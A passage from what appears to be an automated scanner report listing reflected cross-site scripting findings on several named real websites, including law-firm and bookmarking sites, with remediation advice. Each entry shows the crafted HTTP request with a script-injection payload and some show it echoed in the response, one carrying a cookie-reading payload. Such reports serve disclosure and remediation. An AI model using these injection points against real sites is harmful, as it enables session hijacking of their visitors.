GET /domainserve/domainView?dn=58025'%3balert(1)//1b423bdb38b HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload 778ef<script>alert(1)</script>584f04eb84a was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=778ef<script>alert(1)</script>584f04eb84a HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eec5"><script>alert(1)</script>da4345821a9 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=9eec5"><script>alert(1)</script>da4345821a9 HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/java ...[SNIP]... <meta name="description" content="Look no further for the best information on 9eec5"><script>alert(1)</script>da4345821a9.9eec5"> ...[SNIP]...
The value of the dn request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c682d'><script>alert(1)</script>0eba87e9935 was submitted in the dn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domainserve/domainView?dn=c682d'><script>alert(1)</script>0eba87e9935 HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ce31'%3balert(1)//60c9f7c43e2 was submitted in the qkwid1 parameter. This input was echoed as 9ce31';alert(1)//60c9f7c43e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw9ce31'%3balert(1)//60c9f7c43e2&submitid1=sqkw HTTP/1.1 Host: wsdsapi.infospace.com Proxy-Connection: keep-alive Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b6d'%3balert(1)//dd5166876a6 was submitted in the submitid1 parameter. This input was echoed as c9b6d';alert(1)//dd5166876a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkwc9b6d'%3balert(1)//dd5166876a6 HTTP/1.1 Host: wsdsapi.infospace.com Proxy-Connection: keep-alive Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12d9b<script>alert(1)</script>893317d02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php12d9b<script>alert(1)</script>893317d02a5 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:26:41 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=ukeipc25sb6n7ajap5tqd3fsa1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php12d9b<script>alert(1)</script>893317d02a5</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8866e"-alert(1)-"49ee98219f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php8866e"-alert(1)-"49ee98219f7 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:26:40 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=tioju43rv1im39822nkpbqlp26; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php8866e"-alert(1)-"49ee98219f7"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
4.56. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4591f"-alert(1)-"57e0244f404 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/4591f"-alert(1)-"57e0244f404 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:38 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92401
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/4591f"-alert(1)-"57e0244f404"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
4.57. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.arnoldporter.com
Path:
/practices.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
4.59. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.arnoldporter.com
Path:
/publications.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
4.60. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/about_the_firm/firm_history
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | About the Firm | Firm History</title> <meta na ...[SNIP]... about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]> ...[SNIP]...
4.61. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/balancingworkandfamilylife
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.62. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/bestviewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.63. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/biographies
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.64. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/diversityoverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.65. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/diversityupdate
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.66. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/extranet
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.67. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/firmoverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | About the Firm | Firm Overview</title> <meta n ...[SNIP]... ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]> ...[SNIP]...
4.68. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/forum
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.69. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/honorsrankings
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
